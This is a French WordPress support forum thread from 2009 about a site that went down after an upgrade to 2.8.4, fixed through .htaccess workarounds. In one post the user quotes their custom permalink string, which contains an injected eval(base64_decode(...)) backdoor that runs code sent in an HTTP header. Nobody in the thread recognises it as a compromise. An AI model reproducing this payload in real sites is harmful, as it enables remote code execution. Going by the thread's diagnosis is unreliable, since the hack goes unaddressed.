- Statut : non résolu
- Ce sujet contient 8 réponses, 4 participants et a été mis à jour pour la dernière fois par
Anonyme 2, le il y a 15 années et 10 mois.
-
AuteurMessages
-
31 août 2009 à 7 h 25 min #473489
Bonjour,
Ma configuration WP actuelle
– Version de WordPress : 2.8.4
– Thème utilisé : variante de wp-premium
– Extensions en place : downloadmanager et divers
– Nom de l’hebergeur : Free
– Adresse du site : http://perpendiculaires.free.frProblème(s) rencontré(s) : J’ai mis à jour de 2.8 en 2.8.4 comme d’habitude sauf que depuis le site n’est plus accessible du tout.
Tous les fichiers sont là en accès ftp, la base de données est accessible par phpadmin, mais rien en http.
Je n’avais pas fait de sauvegarde avant (eh oui je sais…c’est idiot).Quelqu’un peut-il m’aider ? Merci d’avance.
31 août 2009 à 8 h 05 min #687989tu as une erreur 500?
essaye de désactiver les plugins pour commencer (soit tu les vires via le ftp ou alors tu changes en direct le parametre dans la table des options de la bdd)
31 août 2009 à 8 h 41 min #687990Bonjour,
Aviez vous des permaliens personnalisés ?
Supprimer le fichier .htaccess puis regarder si le site revient alors refaites un fichier .htaccess
avec juste la ligne php 131 août 2009 à 8 h 51 min #687991Pas de permaliens personnalisés.
La suppression de .htaccess et sa recréation ont permis le refonctionnement du site.
Merci bcp !PS : je n’arrive pas à mettre résolu dans le titre du message
31 août 2009 à 9 h 04 min #687992C’est mon boulot ça [RESOLU]
Chez Free souvent,il faut supprimer .htaccess pour retrouver son site puis le remettre,petit truc 😉31 août 2009 à 9 h 36 min #687993J’ai été un peu vite je crois.
La page du site est opérationnelle sans .htaccess, mais impossible d’accéder au moindre article.
Pour les permaliens personnalisés, voici ce que j’ai :/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
Je ne me rappelle pas avoir entré quoique ce soit à cet endroit.
Je crois cependant que le problème vient bien de là.
J’ai essayé de remettre les permaliens standards mais toute modif de ces permaliens m’envoie vers une page d’erreur free.
Par ailleurs, je pense que le plugin WordPress Download Monitor en rajoute une couche dans les pbs car il réécrit un .htaccess qui était normalement effacé. Voici ce qu’il y met :
# BEGIN WordPress
Options +FollowSymLinks
RewriteEngine on
RewriteRule ^documents/([^/]+)$ http://perpendiculaires.free.fr/wp-content/plugins/download-monitor/download.php?id=$1 [L]
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPressUne idée ?
31 août 2009 à 9 h 42 min #687994Salut
J’ai eu le meme probleme que toi et je l ai résolu. Va voir le post
31 août 2009 à 9 h 52 min #687995Bon je crois que le problème est réglé.
Je me suis connecté avec un site sans .htaccess en admin (avec un .htaccess ça ne marchait pas).
Par ftp j’ai envoyé un .htaccess avec juste php 1
J’ai alors procédé à la modification des permaliens (mis ceux par défaut)
Ça semble fonctionner…31 août 2009 à 10 h 23 min #687996c’est ce que j’avais dit 😉
Supprimer le fichier .htaccess puis regarder si le site revient alors refaites un fichier .htaccess
avec juste la ligne php 1 -
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.